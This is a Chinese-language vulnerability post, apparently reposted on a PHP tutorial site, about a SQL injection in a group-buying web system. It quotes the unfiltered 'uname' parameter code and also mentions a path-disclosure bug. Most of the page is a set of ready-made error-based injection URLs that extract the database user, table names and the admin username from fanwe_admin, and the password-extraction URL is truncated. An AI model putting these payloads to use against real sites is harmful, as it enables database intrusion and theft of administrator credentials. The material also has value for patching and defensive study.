来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 以前用这个团购系统的免费的 不知道怎么现在开始收费了好像这个漏洞也在几个低版本中一直存在!漏洞文件:app source article_show php?php if ($_REQUEST [ 39; 39;m 39;...
|
以前用这个团购系统的免费的 不知道怎么现在开始收费了好像
这个漏洞也在几个低版本中一直存在!
漏洞文件:app/source/article_show.php
<?php
if ($_REQUEST [''m''] == ''Article'' && $_REQUEST [''a''] == ''showByUname'') {
$uname = $_REQUEST[''uname'']; //无过滤
if($uname!='''')
{
$uname = rawurldecode($uname);// 不受GPC影响
..........以下代码省略
这么明显的 注射 还存在了 N个版本。。。
还有个爆路径的漏洞:mapi/comm.php
exp:
http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%2527or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2523
获取第一个表,主要是前缀
http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20table_name%20from+information_schema.columns+where+table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
获取账号
http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20adm_name%20from%20fanwe_admin%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2
获取密码,这里需要截取,我也不知道为毛
1
http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20fr
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
